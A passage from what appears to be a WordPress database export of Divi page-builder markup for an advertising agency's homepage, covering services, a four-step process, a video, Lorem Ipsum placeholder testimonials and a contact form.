text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-18 20:43:44','2020-07-18 20:43:44','',134,'https://52.66.212.87/2020/07/18/134-revision-v1/',0,'revision','',0),(338,1,'2020-07-18 20:57:43','2020-07-18 20:57:43','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.0\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/Screenshot-2020-07-19-at-2.05.17-AM.png\" _builder_version=\"4.5.1\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" alt=\"Video digital advertising\" title_text=\"Screenshot 2020-07-19 at 2.05.17 AM\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real 